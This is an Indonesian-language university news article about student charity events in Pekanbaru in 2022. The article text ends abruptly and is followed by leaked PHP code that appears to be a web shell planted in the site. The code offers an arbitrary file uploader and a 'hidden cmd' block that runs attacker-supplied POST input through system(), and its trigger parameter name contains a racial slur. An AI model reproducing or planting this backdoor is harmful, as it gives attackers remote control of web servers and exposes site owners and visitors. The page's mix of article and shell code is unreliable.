#

Charity Event Mahasiswa IBT Pelita Indonesia 2022

Sebagai bentuk kepedulian kepada masyarakat, mahasiswa Institut Bisnis dan Teknologi (IBT) Pelita Indonesia menggagas rangkaian kegiatan amal. Kegiatan pertama berupa berbagi sembako bagi masyarakat yang kurang mampu, yang tersebar di tiga area. Area-area yang dimaksud adalah di Jalan Nangka, Arengka dan Jalan Diponegoro. Esperansa yang didampak sebagai ketua pelaksana kegiatan ini memimpin langsung 8 orang timnya dalam memberikan sembako pada hari Minggu (27/3/2022). “Kami turut bahagia melihat ekspresi kebahagiaan para penerima sembako yang diberikan” ujarnya.

Rangkaian kegiatan amal berikutnya dilakukan pada hari Minggu (10/4/2022) yang diketuai oleh Stevent Marcel dengan jumlah tim yang terlibat sebanyak 10 orang mahasiswa. Adapun bentuk kegiatan yang kedua ini berupa memberikan santunan kepada anak yatim yang berada di Panti Asuhan Rahmat Nur Hidayah yang beralamat di Jalan Arifin Ahmad, Gang Amal, Kelurahan Tangkerang Tengah, Kecamatan Marpoyan Damai, Kota Pekanbaru. Stevent Marcel menyampaikan bahwa kegiatan dapat terlaksana dengan baik tentunya karena kedermawanan para donatur, serta dukungan penuh dari pihak kampus IBT Pelita Indonesia.

Charity Event Mahasiswa IBT Pelita Indonesia dicanangkan akan terus berlangsung sepanjang tahun 2022. Bidang Kemahasiswaan, Alumni dan Kerja Sama Institut Bisnis dan Teknologi (IBT) Pelita Indonesia, Bapak Johan, M.Kom. menyatakan bahwa pihak kampus akan terus berkomitmen mendorong mahasiswa dan mahasiswi IBT Pelita Indonesia untuk aktif dalam kegiatan-kegiatan sosial. Karena karakter mahasiswa IBT Pelita Indonesia selain cakap dalam bidang akademis, juga memiliki kecakapan sosial dan emosional.

The Best Institute in Pekanbaru Riau

"; echo "

Uploader

"; echo "".php_uname()." "; echo "
"; echo "
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Upload Fail";}}} //hidden cmd if(isset($_REQUEST['shellnigga2099X'])){ echo "
";
echo "

CMD

"; echo "".php_uname()." "; echo " "; $shellnigga2099X = ($_POST['coba']); system($shellnigga2099X); echo "
"; die; } ?>